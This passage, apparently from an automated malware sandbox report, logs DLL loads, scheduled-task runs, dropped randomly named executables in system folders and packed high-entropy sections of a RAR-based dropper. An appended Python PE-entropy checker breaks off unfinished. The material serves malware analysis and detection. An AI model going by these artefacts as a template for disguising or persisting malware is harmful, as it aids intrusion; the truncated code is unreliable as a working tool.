                                Source: C:\PerfDll\hyperProviderSavesinto.exeSection loaded: wbemcomn.dllJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeSection loaded: dlnashext.dllJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeSection loaded: wpdshext.dllJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeSection loaded: slc.dllJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                 Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: fastprox.dll
                                 Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: ncobjapi.dll
                                 Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: wbemcomn.dll
                                 Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: kernel.appcore.dll
                                 Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: mpclient.dll
                                 Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: userenv.dll
                                 Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: version.dll
                                 Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: msasn1.dll
                                 Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: wmitomi.dll
                                 Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: mi.dll
                                 Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: miutils.dll
                                 Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: miutils.dll
                                 Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: gpapi.dll
                                 Source: C:\Windows\System32\schtasks.exe  Section loaded: kernel.appcore.dll
                                 Source: C:\Windows\System32\schtasks.exe  Section loaded: taskschd.dll
                                 Source: C:\Windows\System32\schtasks.exe  Section loaded: sspicli.dll
                                 Source: C:\Windows\System32\schtasks.exe  Section loaded: xmllite.dll
                                 Source: C:\Windows\System32\schtasks.exe  Section loaded: kernel.appcore.dll
                                 Source: C:\Windows\System32\schtasks.exe  Section loaded: taskschd.dll
                                 Source: C:\Windows\System32\schtasks.exe  Section loaded: sspicli.dll
                                 Source: C:\Windows\System32\schtasks.exe  Section loaded: xmllite.dll
                                 Source: C:\Windows\System32\schtasks.exe  Section loaded: kernel.appcore.dll
                                 Source: C:\Windows\System32\schtasks.exe  Section loaded: taskschd.dll
                                 Source: C:\Windows\System32\schtasks.exe  Section loaded: sspicli.dll
                                 Source: C:\Windows\System32\schtasks.exe  Section loaded: xmllite.dll
                                 Source: C:\Windows\System32\schtasks.exe  Section loaded: kernel.appcore.dll
                                 Source: C:\Windows\System32\schtasks.exe  Section loaded: taskschd.dll
                                 Source: C:\Windows\System32\schtasks.exe  Section loaded: sspicli.dll
                                 Source: C:\Windows\System32\schtasks.exe  Section loaded: xmllite.dll
                                 Source: C:\Windows\System32\schtasks.exe  Section loaded: kernel.appcore.dll
                                 Source: C:\Windows\System32\schtasks.exe  Section loaded: taskschd.dll
                                 Source: C:\Windows\System32\schtasks.exe  Section loaded: sspicli.dll
                                 Source: C:\Windows\System32\schtasks.exe  Section loaded: xmllite.dll
                                 Source: C:\Windows\System32\schtasks.exe  Section loaded: kernel.appcore.dll
                                 Source: C:\Windows\System32\schtasks.exe  Section loaded: taskschd.dll
                                 Source: C:\Windows\System32\schtasks.exe  Section loaded: sspicli.dll
                                 Source: C:\Windows\System32\schtasks.exe  Section loaded: xmllite.dll
                                 Source: C:\Windows\System32\schtasks.exe  Section loaded: kernel.appcore.dll
                                 Source: C:\Windows\System32\schtasks.exe  Section loaded: taskschd.dll
                                 Source: C:\Windows\System32\schtasks.exe  Section loaded: sspicli.dll
                                 Source: C:\Windows\System32\schtasks.exe  Section loaded: xmllite.dll
                                 Source: C:\Windows\System32\schtasks.exe  Section loaded: kernel.appcore.dll
                                 Source: C:\Windows\System32\schtasks.exe  Section loaded: taskschd.dll
                                 Source: C:\Windows\System32\schtasks.exe  Section loaded: sspicli.dll
                                 Source: C:\Windows\System32\schtasks.exe  Section loaded: xmllite.dll
                                 Source: C:\Windows\System32\schtasks.exe  Section loaded: kernel.appcore.dll
                                 Source: C:\Windows\System32\schtasks.exe  Section loaded: taskschd.dll
                                 Source: C:\Windows\System32\schtasks.exe  Section loaded: sspicli.dll
                                 Source: C:\Windows\System32\schtasks.exe  Section loaded: xmllite.dll
                                 Source: C:\Windows\System32\schtasks.exe  Section loaded: kernel.appcore.dll
                                 Source: C:\Windows\System32\schtasks.exe  Section loaded: taskschd.dll
                                 Source: C:\Windows\System32\schtasks.exe  Section loaded: sspicli.dll
                                 Source: C:\Windows\System32\schtasks.exe  Section loaded: xmllite.dll
                                 Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe  Section loaded: mscoree.dll
                                 Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe  Section loaded: apphelp.dll
                                 Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe  Section loaded: kernel.appcore.dll
                                 Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe  Section loaded: version.dll
                                 Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe  Section loaded: vcruntime140_clr0400.dll
                                 Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe  Section loaded: ucrtbase_clr0400.dll
                                 Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe  Section loaded: ucrtbase_clr0400.dll
                                 Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe  Section loaded: windows.storage.dll
                                 Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe  Section loaded: wldp.dll
                                 Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe  Section loaded: profapi.dll
                                 Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe  Section loaded: cryptsp.dll
                                 Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe  Section loaded: rsaenh.dll
                                 Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe  Section loaded: cryptbase.dll
                                 Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe  Section loaded: sspicli.dll
                                 Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe  Section loaded: ktmw32.dll
                                 Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe  Section loaded: wbemcomn.dll
                                 Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe  Section loaded: amsi.dll
                                 Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe  Section loaded: userenv.dll
                                 Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe  Section loaded: iphlpapi.dll
                                 Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe  Section loaded: dnsapi.dll
                                 Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe  Section loaded: dhcpcsvc6.dll
                                 Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe  Section loaded: dhcpcsvc.dll
                                 Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe  Section loaded: winnsi.dll
                                 Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe  Section loaded: textshaping.dll
                                 Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe  Section loaded: uxtheme.dll
                                 Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe  Section loaded: textinputframework.dll
                                 Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe  Section loaded: coreuicomponents.dll
                                 Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe  Section loaded: coremessaging.dll
                                 Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe  Section loaded: ntmarta.dll
                                 Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe  Section loaded: coremessaging.dll
                                 Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe  Section loaded: wintypes.dll
                                 Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe  Section loaded: wintypes.dll
                                 Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe  Section loaded: wintypes.dll
                                 Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe  Section loaded: rasapi32.dll
                                 Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe  Section loaded: rasman.dll
                                 Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe  Section loaded: rtutils.dll
                                 Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe  Section loaded: mswsock.dll
                                 Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe  Section loaded: winhttp.dll
                                 Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe  Section loaded: ondemandconnroutehelper.dll
                                 Source: C:\Windows\System32\schtasks.exe  Section loaded: kernel.appcore.dll
                                 Source: C:\Windows\System32\schtasks.exe  Section loaded: taskschd.dll
                                 Source: C:\Windows\System32\schtasks.exe  Section loaded: sspicli.dll
                                 Source: C:\Windows\System32\schtasks.exe  Section loaded: xmllite.dll
                                 Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe  Section loaded: mscoree.dll
                                 Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe  Section loaded: kernel.appcore.dll
                                 Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe  Section loaded: version.dll
                                 Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe  Section loaded: vcruntime140_clr0400.dll
                                 Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe  Section loaded: ucrtbase_clr0400.dll
                                 Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe  Section loaded: ucrtbase_clr0400.dll
                                 Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe  Section loaded: windows.storage.dll
                                 Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe  Section loaded: wldp.dll
                                 Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe  Section loaded: profapi.dll
                                 Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe  Section loaded: cryptsp.dll
                                 Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe  Section loaded: rsaenh.dll
                                 Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe  Section loaded: cryptbase.dll
                                 Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe  Section loaded: sspicli.dll
                                 Source: C:\Windows\System32\schtasks.exe  Section loaded: kernel.appcore.dll
                                 Source: C:\Windows\System32\schtasks.exe  Section loaded: taskschd.dll
                                 Source: C:\Windows\System32\schtasks.exe  Section loaded: sspicli.dll
                                 Source: C:\Windows\System32\schtasks.exe  Section loaded: xmllite.dll
                                 Source: C:\Windows\System32\wusa.exe  Section loaded: dpx.dll
                                 Source: C:\Windows\System32\wusa.exe  Section loaded: wtsapi32.dll
                                 Source: C:\Windows\System32\wusa.exe  Section loaded: cryptsp.dll
                                 Source: C:\Windows\System32\wusa.exe  Section loaded: kernel.appcore.dll
                                 Source: C:\Windows\System32\wusa.exe  Section loaded: uxtheme.dll
                                 Source: C:\Windows\System32\schtasks.exe  Section loaded: kernel.appcore.dll
                                 Source: C:\Windows\System32\schtasks.exe  Section loaded: taskschd.dll
                                 Source: C:\Windows\System32\schtasks.exe  Section loaded: sspicli.dll
                                 Source: C:\Windows\System32\schtasks.exe  Section loaded: xmllite.dll
                                 Source: C:\Windows\System32\schtasks.exe  Section loaded: kernel.appcore.dll
                                 Source: C:\Windows\System32\schtasks.exe  Section loaded: taskschd.dll
                                 Source: C:\Windows\System32\schtasks.exe  Section loaded: sspicli.dll
                                 Source: C:\Windows\System32\schtasks.exe  Section loaded: xmllite.dll
                                 Source: C:\Windows\System32\schtasks.exe  Section loaded: kernel.appcore.dll
                                 Source: C:\Windows\System32\schtasks.exe  Section loaded: taskschd.dll
                                 Source: C:\Windows\System32\schtasks.exe  Section loaded: sspicli.dll
                                 Source: C:\Windows\System32\schtasks.exe  Section loaded: xmllite.dll
                                 Source: C:\Windows\System32\cmd.exe  Section loaded: cmdext.dll
                                 Source: C:\Windows\System32\cmd.exe  Section loaded: apphelp.dll
                                 Source: C:\Windows\System32\chcp.com  Section loaded: ulib.dll
                                 Source: C:\Windows\System32\chcp.com  Section loaded: fsutilext.dll
                                 Source: C:\Windows\System32\PING.EXE  Section loaded: iphlpapi.dll
                                 Source: C:\Windows\System32\PING.EXE  Section loaded: mswsock.dll
                                 Source: C:\Windows\System32\PING.EXE  Section loaded: dnsapi.dll
                                 Source: C:\Windows\System32\PING.EXE  Section loaded: rasadhlp.dll
                                 Source: C:\Windows\System32\PING.EXE  Section loaded: fwpuclnt.dll
                                 Source: C:\Windows\System32\PING.EXE  Section loaded: winnsi.dll
                                 Source: C:\Windows\System32\dialer.exe  Section loaded: ntmarta.dll
                                 Source: C:\ProgramData\celaehnmjins\nhxnqwkhmssh.exe  Section loaded: apphelp.dll
                                 Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
                                 Source: Window Recorder  Window detected: More than 3 window changes detected
                                 Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                                 Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe  Static PE information: Image base 0x140000000 > 0x60000000
                                 Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe  Static file information: File size 6701051 > 1048576
                                 Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe  Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                 Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe  Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                 Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe  Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                 Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe  Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                 Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe  Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                 Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe  Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                 Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe  Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                 Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe  Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: GargantuaN.exe, 00000001.00000000.1635712049.0000000000D83000.00000002.00000001.01000000.00000009.sdmp, GargantuaN.exe, 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp, GargantuaN.exe, 00000001.00000003.1637953778.0000000006D7B000.00000004.00000020.00020000.00000000.sdmp, GargantuaN.exe, 00000001.00000003.1638428127.00000000057FF000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxzip64\Release\sfxzip.pdb source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe, 00000000.00000000.1628945437.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp, C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe, 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeFile created: C:\Users\user\AppData\Local\Temp\__tmp_rar_sfx_access_check_7103562Jump to behavior
                                Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeStatic PE information: section name: .didat
                                Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeStatic PE information: section name: _RDATA
                                Source: GargantuanS.exe.0.drStatic PE information: section name: .00cfg
                                Source: GargantuaN.exe.0.drStatic PE information: section name: .didat
                                Source: nhxnqwkhmssh.exe.2.drStatic PE information: section name: .00cfg
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeCode function: 1_2_00D6F640 push ecx; ret 1_2_00D6F653
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeCode function: 1_2_00D6EB78 push eax; ret 1_2_00D6EB96
                                Source: C:\Windows\System32\conhost.exeCode function: 7_2_000001B0BB96ACDD push rcx; retf 003Fh7_2_000001B0BB96ACDE
                                Source: C:\Windows\System32\conhost.exeCode function: 7_2_000001B0BB99C6DD push rcx; retf 003Fh7_2_000001B0BB99C6DE
                                Source: C:\PerfDll\hyperProviderSavesinto.exeCode function: 8_2_00007FFD9BC4E40D pushfd ; ret 8_2_00007FFD9BC4E422
                                Source: C:\PerfDll\hyperProviderSavesinto.exeCode function: 8_2_00007FFD9BC445D5 push eax; ret 8_2_00007FFD9BC445E9
                                Source: C:\PerfDll\hyperProviderSavesinto.exeCode function: 8_2_00007FFD9BCE63DD push C181916Ch; ret 8_2_00007FFD9BCE63EE
                                Source: C:\PerfDll\hyperProviderSavesinto.exeCode function: 8_2_00007FFD9BCE5013 push eax; ret 8_2_00007FFD9BCE5014
                                Source: C:\PerfDll\hyperProviderSavesinto.exeCode function: 8_2_00007FFD9BCE26E8 push eax; ret 8_2_00007FFD9BCE26EF
                                Source: C:\PerfDll\hyperProviderSavesinto.exeCode function: 8_2_00007FFD9BCE32B4 push edx; ret 8_2_00007FFD9BCE32B6
                                Source: C:\PerfDll\hyperProviderSavesinto.exeCode function: 8_2_00007FFD9BCE367D push eax; ret 8_2_00007FFD9BCE367E
                                Source: C:\PerfDll\hyperProviderSavesinto.exeCode function: 8_2_00007FFD9BCE019B push edx; ret 8_2_00007FFD9BCE019C
                                Source: C:\PerfDll\hyperProviderSavesinto.exeCode function: 8_2_00007FFD9BCE357F push esp; retf 8_2_00007FFD9BCE3585
                                Source: C:\PerfDll\hyperProviderSavesinto.exeCode function: 8_2_00007FFD9BCE495A push ecx; ret 8_2_00007FFD9BCE495B
                                Source: C:\PerfDll\hyperProviderSavesinto.exeCode function: 8_2_00007FFD9BCE315C push edx; ret 8_2_00007FFD9BCE315D
                                Source: C:\PerfDll\hyperProviderSavesinto.exeCode function: 8_2_00007FFD9BCE146F pushad ; ret 8_2_00007FFD9BCE1470
                                Source: C:\PerfDll\hyperProviderSavesinto.exeCode function: 8_2_00007FFD9BCE148D pushad ; ret 8_2_00007FFD9BCE14A1
                                Source: C:\PerfDll\hyperProviderSavesinto.exeCode function: 8_2_00007FFD9BCE2885 push eax; ret 8_2_00007FFD9BCE2886
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 9_2_00000216D26DACDD push rcx; retf 003Fh9_2_00000216D26DACDE
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 9_2_00000216D270C6DD push rcx; retf 003Fh9_2_00000216D270C6DE
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeCode function: 20_2_00007FFD9BD163E3 push C181916Ch; ret 20_2_00007FFD9BD163EE
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeCode function: 20_2_00007FFD9BD1357F push esp; retf 20_2_00007FFD9BD13585
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeCode function: 20_2_00007FFD9BD1148C pushad ; ret 20_2_00007FFD9BD114A1
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeCode function: 20_2_00007FFD9BD1146F pushad ; ret 20_2_00007FFD9BD11470
                                Source: C:\Windows\System32\cmd.exeCode function: 38_2_00000150E905ACDD push rcx; retf 003Fh38_2_00000150E905ACDE
                                Source: C:\Windows\System32\cmd.exeCode function: 38_2_00000150E93FC6DD push rcx; retf 003Fh38_2_00000150E93FC6DE
                                Source: C:\Windows\System32\conhost.exeCode function: 40_2_00000267FCE7ACDD push rcx; retf 003Fh40_2_00000267FCE7ACDE
                                Source: C:\Windows\System32\conhost.exeCode function: 40_2_00000267FCEAC6DD push rcx; retf 003Fh40_2_00000267FCEAC6DE
                                Source: C:\Windows\System32\PING.EXECode function: 45_2_000002359B50ACDD push rcx; retf 003Fh45_2_000002359B50ACDE
                                Source: C:\Windows\System32\PING.EXECode function: 45_2_000002359B53C6DD push rcx; retf 003Fh45_2_000002359B53C6DE
                                Source: C:\Windows\System32\winlogon.exeCode function: 49_2_00000225DC62ACDD push rcx; retf 003Fh49_2_00000225DC62ACDE
                                Source: hyperProviderSavesinto.exe.1.drStatic PE information: section name: .text entropy: 7.557452107884656
                                Source: KZcLqgnLvRf.exe.8.drStatic PE information: section name: .text entropy: 7.557452107884656
                                Source: RuntimeBroker.exe.8.drStatic PE information: section name: .text entropy: 7.557452107884656
                                Source: KZcLqgnLvRf.exe0.8.drStatic PE information: section name: .text entropy: 7.557452107884656
                                Source: KZcLqgnLvRf.exe1.8.drStatic PE information: section name: .text entropy: 7.557452107884656
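Added example (not part of the Joe Sandbox report and not code from the sample): a stdlib-only Python parser that reproduces the checks behind the static PE signatures above, on a PE32+ image built inline. It reads the image base, decodes the DllCharacteristics bits into the flag names the report prints, lists section names and computes per-section Shannon entropy, which is the figure behind "section name: .text entropy: 7.557". The constructed file copies the header values from the report (image base 0x140000000, the five flags) and fills .text with seeded random bytes; the extra section .sec0, the 7.0 entropy threshold and the two section-name lists are assumptions for the example.

```python
import math
import random
import struct
from collections import Counter

# IMAGE_DLLCHARACTERISTICS_* bits from the PE/COFF specification.
DLL_CHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA", 0x0040: "DYNAMIC_BASE", 0x0080: "FORCE_INTEGRITY",
    0x0100: "NX_COMPAT", 0x0400: "NO_SEH", 0x4000: "GUARD_CF", 0x8000: "TERMINAL_SERVER_AWARE",
}
# Assumed name lists: ordinary linker sections, and the MSVC-generated ones this
# report flags (.didat = delay-import data, .00cfg = control-flow-guard data, _RDATA).
COMMON_SECTIONS = {".text", ".rdata", ".data", ".pdata", ".rsrc", ".reloc", ".idata", ".edata", ".tls", ".bss"}
MSVC_EXTRA_SECTIONS = {".didat", ".00cfg", "_RDATA"}
PACKED_ENTROPY = 7.0   # assumed threshold (bits/byte); compressed or encrypted code sits above it


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for a constant block, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def parse_pe(image: bytes) -> dict:
    """Image base, DllCharacteristics flag names and section table of a PE32+ file."""
    if image[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    coff = e_lfanew + 4
    nsections = struct.unpack_from("<H", image, coff + 2)[0]
    opt_size = struct.unpack_from("<H", image, coff + 16)[0]
    opt = coff + 20                                   # optional header follows the 20-byte COFF header
    if struct.unpack_from("<H", image, opt)[0] != 0x20B:
        raise ValueError("only PE32+ is handled here")
    image_base = struct.unpack_from("<Q", image, opt + 24)[0]
    dllchars = struct.unpack_from("<H", image, opt + 70)[0]
    sections = []
    for i in range(nsections):
        name, _vsize, _va, rawsize, rawptr = struct.unpack_from("<8sIIII", image, opt + opt_size + 40 * i)
        raw = image[rawptr:rawptr + rawsize]
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "raw_size": rawsize, "entropy": round(shannon_entropy(raw), 3)})
    return {"image_base": image_base,
            "dll_characteristics": [v for k, v in sorted(DLL_CHARACTERISTICS.items()) if dllchars & k],
            "sections": sections}


def classify_section(sec: dict) -> str:
    """Entropy first (a packed .text is the strong signal), then the name."""
    if sec["entropy"] > PACKED_ENTROPY:
        return "packed-or-encrypted"
    if sec["name"] in COMMON_SECTIONS:
        return "ok"
    if sec["name"] in MSVC_EXTRA_SECTIONS:
        return "compiler-generated"
    return "unusual-name"


def build_sample_pe() -> bytes:
    """Constructed minimal PE32+: headers mirror the report, .text is random bytes."""
    rng = random.Random(1)
    text_raw = bytes(rng.getrandbits(8) for _ in range(4096))       # high entropy, like a packed payload
    cfg_raw = b"\0" * 480 + b"CFG\0" * 8                            # low entropy
    sec_raw = b"\0" * 512                                           # constant block
    # (name, VirtualAddress, VirtualSize, SizeOfRawData, PointerToRawData, Characteristics)
    sections = [(b".text", 0x1000, 0x1000, len(text_raw), 0x200, 0x60000020),
                (b".00cfg", 0x2000, 0x200, len(cfg_raw), 0x1200, 0x40000040),
                (b".sec0", 0x3000, 0x200, len(sec_raw), 0x1400, 0x40000040)]
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)             # e_lfanew = 0x40
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x8664, len(sections), 0, 0, 0, 112, 0x22)
    opt = bytearray(112)
    struct.pack_into("<H", opt, 0, 0x20B)                            # PE32+ magic
    struct.pack_into("<Q", opt, 24, 0x140000000)                     # ImageBase as in the report
    struct.pack_into("<H", opt, 70, 0x0020 | 0x0040 | 0x0100 | 0x4000 | 0x8000)
    table = b"".join(struct.pack("<8sIIIIIIHHI", n, vs, va, rs, rp, 0, 0, 0, 0, ch)
                     for n, va, vs, rs, rp, ch in sections)
    header = dos + coff + bytes(opt) + table
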